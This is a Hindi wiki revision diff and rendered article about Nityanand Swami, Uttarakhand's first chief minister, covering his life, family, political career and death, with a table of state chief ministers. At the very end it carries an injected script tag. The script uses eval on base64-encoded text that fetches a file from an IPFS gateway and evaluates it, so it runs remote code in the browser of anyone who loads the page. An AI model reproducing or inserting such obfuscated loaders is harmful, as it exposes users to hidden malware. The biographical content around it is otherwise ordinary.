Difference between revisions of "नित्यानंद स्वामी (राजनीतिज्ञ)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 4 users not shown)
Line 6: Line 6:
 
|जन्म= [[27 दिसम्बर]] [[1927]]  
 
|जन्म= [[27 दिसम्बर]] [[1927]]  
 
|जन्म भूमि= नारनौल, [[हरियाणा]]
 
|जन्म भूमि= नारनौल, [[हरियाणा]]
|मृत्यु=-[[12 दिसम्बर]], [[2012]]
+
|मृत्यु=[[12 दिसम्बर]], [[2012]]
 
|मृत्यु स्थान=[[देहरादून]], [[उत्तराखंड]]
 
|मृत्यु स्थान=[[देहरादून]], [[उत्तराखंड]]
 
|मृत्यु कारण=
 
|मृत्यु कारण=
|अविभावक=
+
|अभिभावक=
 
|पति/पत्नी=चंद्रकांता  
 
|पति/पत्नी=चंद्रकांता  
 
|संतान=चार पुत्रियां
 
|संतान=चार पुत्रियां
Line 20: Line 20:
 
|भाषा=
 
|भाषा=
 
|जेल यात्रा=
 
|जेल यात्रा=
|कार्य काल=[[9 नवंबर]] [[2000]] से [[29 अक्टूबर]] [[2001]] तक  
+
|कार्य काल=[[9 नवंबर]] [[2000]] से [[29 अक्टूबर]] [[2001]] तक
 
|विद्यालय=
 
|विद्यालय=
 
|शिक्षा=
 
|शिक्षा=
Line 33: Line 33:
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन={{अद्यतन|16:46, 12 दिसम्बर 2012 (IST)}}
 
|अद्यतन={{अद्यतन|16:46, 12 दिसम्बर 2012 (IST)}}
}}
+
}}'''नित्यानंद स्वामी''' ([[अंग्रेज़ी]]: ''Nityanand Swami'', जन्म: [[27 दिसम्बर]] [[1927]]; मृत्यु: [[12 दिसम्बर]], [[2012]]) [[उत्तराखंड]] के पहले [[मुख्यमंत्री]] और [[भारतीय जनता पार्टी]] के वयोवृद्ध नेता थे।  
'''नित्यानंद स्वामी''' ([[अंग्रेज़ी]]: ''Nityanand Swami'', जन्म: [[27 दिसम्बर]] [[1927]] - मृत्यु: [[12 दिसम्बर]], [[2012]]) [[उत्तराखंड]] के पहले [[मुख्यमंत्री]] और [[भारतीय जनता पार्टी]] के वयोवृद्ध नेता थे।  
 
 
==जीवन परिचय==
 
==जीवन परिचय==
27 दिसंबर 1927 को नारनौल [[हरियाणा]] में जन्मे नित्यानंद स्वामी का अधिकांश जीवन [[देहरादून]] में ही बीता। उनके पिता वन अनुसंधान संस्थान, देहरादून में तैनात थे। उनका विवाह चंद्रकांता से हुआ, दोनों की चार पुत्रियां हैं। दिवंगत स्वामी एक कुशल व्यक्तित्व के धनी थे। यही कारण रहा कि उन्हें 1950 में डीएवी कालेज के अध्यक्ष चुने गए। 50-60 के दशक में वह जनसंघ के सक्रिय कार्यकर्ता रहे और विभिन्न मजदूर यूनियन के अध्यक्ष भी रहे। उन्होंने वकालत को अपना पेशा बनाया। शुरुआत में वह [[कांग्रेस]] से जुड़े रहे और बाद में [[भाजपा]] से जुड़ गए।
+
27 दिसंबर 1927 को नारनौल [[हरियाणा]] में जन्मे नित्यानंद स्वामी का अधिकांश जीवन [[देहरादून]] में ही बीता। उनके पिता वन अनुसंधान संस्थान, देहरादून में तैनात थे। उनका विवाह चंद्रकांता से हुआ, दोनों की चार पुत्रियां हैं। दिवंगत स्वामी एक कुशल व्यक्तित्व के धनी थे। यही कारण रहा कि उन्हें [[1950]] में डीएवी कालेज के अध्यक्ष चुने गए। 50-60 के दशक में वह जनसंघ के सक्रिय कार्यकर्ता रहे और विभिन्न मज़दूर यूनियन के अध्यक्ष भी रहे। उन्होंने वकालत को अपना पेशा बनाया। शुरुआत में वह [[कांग्रेस]] से जुड़े रहे और बाद में [[भाजपा]] से जुड़ गए।
 
====परिवार====
 
====परिवार====
 
नित्यानंद स्वामी की चार बेटियां हैं। दो बेटियों की शादी एक ही घर में हुई है। ये बेटियां देहरादून के कांवली रोड स्थित आवास पर रहती हैं। नित्यानंद स्वामी भी अपनी इन्हीं दो बेटियों के साथ रहते थे।  
 
नित्यानंद स्वामी की चार बेटियां हैं। दो बेटियों की शादी एक ही घर में हुई है। ये बेटियां देहरादून के कांवली रोड स्थित आवास पर रहती हैं। नित्यानंद स्वामी भी अपनी इन्हीं दो बेटियों के साथ रहते थे।  
 
==राजनीतिक सफ़र==
 
==राजनीतिक सफ़र==
 
जब [[9 नवंबर]] [[2000]] को [[उत्तर प्रदेश]] से उत्तराखंड को अलग किया गया तो उस वक्त भारतीय जनता पार्टी की सरकार थी। संवैधानिक प्रक्रिया के तहत भारतीय जनता पार्टी के ही किसी वरिष्ठ नेता को अगले चुनाव तक मुख्यमंत्री बनाया जाना था। इसी क्रम में सबसे ऊपर नाम था नित्यानंद स्वामी का। नित्यानंद स्वामी उत्तराखंड के पहले मनोनित मुख्यमंत्री बने। 9 नंबवर 2000 से [[29 अक्टूबर]] [[2001]] तक वे प्रदेश के मुख्यमंत्री थे। उनका कुल कार्यकाल 11 महीने 20 दिन रहा। इससे पहले वह वर्ष 1991 में उत्तर प्रदेश में [[विधान परिषद]] के उपसभापति रहे और 1992 में सभापति बने। सक्रिय राजनीतिक जीवन के आरंभ में दिवंगत स्वामी वर्ष 1969 में अविभाजित उत्तर प्रदेश राज्य में देहरादून विधानसभा क्षेत्र से विधान परिषद से सदस्य निर्वाचित हुए।
 
जब [[9 नवंबर]] [[2000]] को [[उत्तर प्रदेश]] से उत्तराखंड को अलग किया गया तो उस वक्त भारतीय जनता पार्टी की सरकार थी। संवैधानिक प्रक्रिया के तहत भारतीय जनता पार्टी के ही किसी वरिष्ठ नेता को अगले चुनाव तक मुख्यमंत्री बनाया जाना था। इसी क्रम में सबसे ऊपर नाम था नित्यानंद स्वामी का। नित्यानंद स्वामी उत्तराखंड के पहले मनोनित मुख्यमंत्री बने। 9 नंबवर 2000 से [[29 अक्टूबर]] [[2001]] तक वे प्रदेश के मुख्यमंत्री थे। उनका कुल कार्यकाल 11 महीने 20 दिन रहा। इससे पहले वह वर्ष 1991 में उत्तर प्रदेश में [[विधान परिषद]] के उपसभापति रहे और 1992 में सभापति बने। सक्रिय राजनीतिक जीवन के आरंभ में दिवंगत स्वामी वर्ष 1969 में अविभाजित उत्तर प्रदेश राज्य में देहरादून विधानसभा क्षेत्र से विधान परिषद से सदस्य निर्वाचित हुए।
 
 
==निधन==
 
==निधन==
12 दिसम्बर 2012, [[बुधवार]] को सुबह सीएमआई अस्पताल देहरादून में नौ बजकर 35 मिनट पर उन्होंने अंतिम सांस ली। वह 84 वर्ष के थे। मंगलवार रात को अचानक स्वास्थ्य खराब होने पर उन्हें सीएमआई अस्पताल में भर्ती कराया गया था। जहां चिकित्सीय परीक्षण के लिए उन्हें वेंटिलेटर पर रखा गया था। बुधवार सुबह उन्होंने दम तोड़ दिया।  
+
12 दिसम्बर 2012, [[बुधवार]] को सुबह सीएमआई अस्पताल देहरादून में नौ बजकर 35 मिनट पर उन्होंने अंतिम सांस ली। वह 84 वर्ष के थे। मंगलवार रात को अचानक स्वास्थ्य खराब होने पर उन्हें सीएमआई अस्पताल में भर्ती कराया गया था। जहां चिकित्सीय परीक्षण के लिए उन्हें वेंटिलेटर पर रखा गया था। बुधवार सुबह उन्होंने दम तोड़ दिया।
 
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तराखंड के मुख्यमंत्री}}
+
{{उत्तराखंड के मुख्यमंत्री}}{{भारतीय राज्यों के मुख्यमंत्री}}
[[Category:उत्तराखंड के मुख्यमंत्री]] [[Category:राजनीतिज्ञ]] [[Category:साहित्य कोश]][[Category:राजनीति कोश]]
+
[[Category:मुख्यमंत्री]][[Category:उत्तराखंड के मुख्यमंत्री]][[Category:उत्तराखंड]]
 +
[[Category:राजनीतिज्ञ]][[Category:राजनेता]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:जीवनी साहित्य]][[Category:राजनीति कोश]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:भारतीय राज्यों के मुख्यमंत्रियों की सूची]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 10:08, 16 February 2020

nityanand svami (rajanitijn)
poora nam nityanand svami
janm 27 disambar 1927
janm bhoomi naranaul, hariyana
mrityu 12 disambar, 2012
mrityu sthan deharadoon, uttarakhand
pati/patni chandrakaanta
santan char putriyaan
nagarikata bharatiy
parti kaangres, bharatiy janata parti
pad uttarakhand ke pahale mukhyamantri
kary kal 9 navanbar 2000 se 29 aktoobar 2001 tak
adyatan‎

nityanand svami (aangrezi: Nityanand Swami, janm: 27 disambar 1927; mrityu: 12 disambar, 2012) uttarakhand ke pahale mukhyamantri aur bharatiy janata parti ke vayovriddh neta the.

jivan parichay

27 disanbar 1927 ko naranaul hariyana mean janme nityanand svami ka adhikaansh jivan deharadoon mean hi bita. unake pita van anusandhan sansthan, deharadoon mean tainat the. unaka vivah chandrakaanta se hua, donoan ki char putriyaan haian. divangat svami ek kushal vyaktitv ke dhani the. yahi karan raha ki unhean 1950 mean dievi kalej ke adhyaksh chune ge. 50-60 ke dashak mean vah janasangh ke sakriy karyakarta rahe aur vibhinn mazadoor yooniyan ke adhyaksh bhi rahe. unhoanne vakalat ko apana pesha banaya. shuruat mean vah kaangres se ju de rahe aur bad mean bhajapa se ju d ge.

parivar

nityanand svami ki char betiyaan haian. do betiyoan ki shadi ek hi ghar mean huee hai. ye betiyaan deharadoon ke kaanvali rod sthit avas par rahati haian. nityanand svami bhi apani inhian do betiyoan ke sath rahate the.

rajanitik safar

jab 9 navanbar 2000 ko uttar pradesh se uttarakhand ko alag kiya gaya to us vakt bharatiy janata parti ki sarakar thi. sanvaidhanik prakriya ke tahat bharatiy janata parti ke hi kisi varishth neta ko agale chunav tak mukhyamantri banaya jana tha. isi kram mean sabase oopar nam tha nityanand svami ka. nityanand svami uttarakhand ke pahale manonit mukhyamantri bane. 9 nanbavar 2000 se 29 aktoobar 2001 tak ve pradesh ke mukhyamantri the. unaka kul karyakal 11 mahine 20 din raha. isase pahale vah varsh 1991 mean uttar pradesh mean vidhan parishad ke upasabhapati rahe aur 1992 mean sabhapati bane. sakriy rajanitik jivan ke aranbh mean divangat svami varsh 1969 mean avibhajit uttar pradesh rajy mean deharadoon vidhanasabha kshetr se vidhan parishad se sadasy nirvachit hue.

nidhan

12 disambar 2012, budhavar ko subah siemaee aspatal deharadoon mean nau bajakar 35 minat par unhoanne aantim saans li. vah 84 varsh ke the. mangalavar rat ko achanak svasthy kharab hone par unhean siemaee aspatal mean bharti karaya gaya tha. jahaan chikitsiy parikshan ke lie unhean veantiletar par rakha gaya tha. budhavar subah unhoanne dam to d diya.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

bharatiy rajyoan mean padasth mukhyamantri
kramaank rajy mukhyamantri tasvir parti padabhar grahan
1. arunachal pradesh pema khaandoo 80px|center bhajapa 17 julaee, 2016
2. asam himanta bisva sarama 80px|center bhajapa 10 mee, 2021
3. aandhr pradesh vaee es jaganamohan reddi 80px|center vaeeesar kaangres parti 30 mee, 2019
4. uttar pradesh yogi adityanath 80px|center bhajapa 19 march, 2017
5. uttarakhand pushkar sianh dhami 80px|center bhajapa 4 julaee, 2021
6. odisha navin patanayak 80px|center bijoo janata dal 5 march, 2000
7. karnatak siddharamaiya 80px|center bharatiy rashtriy kaangres 20 mee, 2023
8. keral pinaraee vijayan 80px|center marksavadi kamyunist parti 25 mee, 2016
9. gujarat bhoopendr patel 80px|center bhajapa 12 sitambar, 2021
10. gova pramod savant 80px|center bhajapa 19 march, 2019
11. chhattisagadh vishnu dev say 80px|center bharatiy janata parti 13 disambar, 2023
12. jammoo-kashmir rikt (rajyapal shasan) lagoo nahian 20 joon, 2018
13. jharakhand hemant soren 80px|center jharakhand mukti morcha 29 disambar, 2019
14. tamil nadu em. ke. stalin 80px|center dravi d munnetr k dagam 7 mee, 2021
15. tripura manik saha 80px|center bhajapa 15 mee, 2022
16. telangana anumula revant reddi 80px|center bharatiy rashtriy kaangres 7 disanbar, 2023
17. dilli aravind kejarival 80px|center ap 14 faravari, 2015
18. nagalaind nephiyoo riyo 80px|center enadipipi 8 march, 2018
19. panjab bhagavant man 80px|center am adami parti 16 march, 2022
20. pashchim bangal mamata banarji 80px|center trinamool kaangres 20 mee, 2011
21. puducheri en. rangasvami 80px|center kaangres 7 mee, 2021
22. bihar nitish kumar 80px|center jadayoo 27 julaee, 2017
23. manipur en. biren sianh 80px|center bhajapa 15 march, 2017
24. madhy pradesh mohan yadav 80px|center bhajapa 13 disanbar, 2023
25. maharashtr ekanath shiande 80px|center shiv sena 30 joon, 2022
26. mizoram laladuhoma 80px|center joram pipals moovameant 8 disambar, 2023
27. meghalay k aaunarad sangama 80px|center enapipi 6 march, 2018
28. rajasthan bhajan lal sharma 80px|center bharatiy janata parti 15 disambar, 2023
29. sikkim prem sianh tamaang 80px|center sikkim kraantikari morcha 27 mee, 2019
30. hariyana nayab sianh saini 80px|center bhajapa 12 march, 2024
31. himachal pradesh sukhaviandar sianh sukkhoo 80px|center bharatiy rashtriy kaangres 11 disambar, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>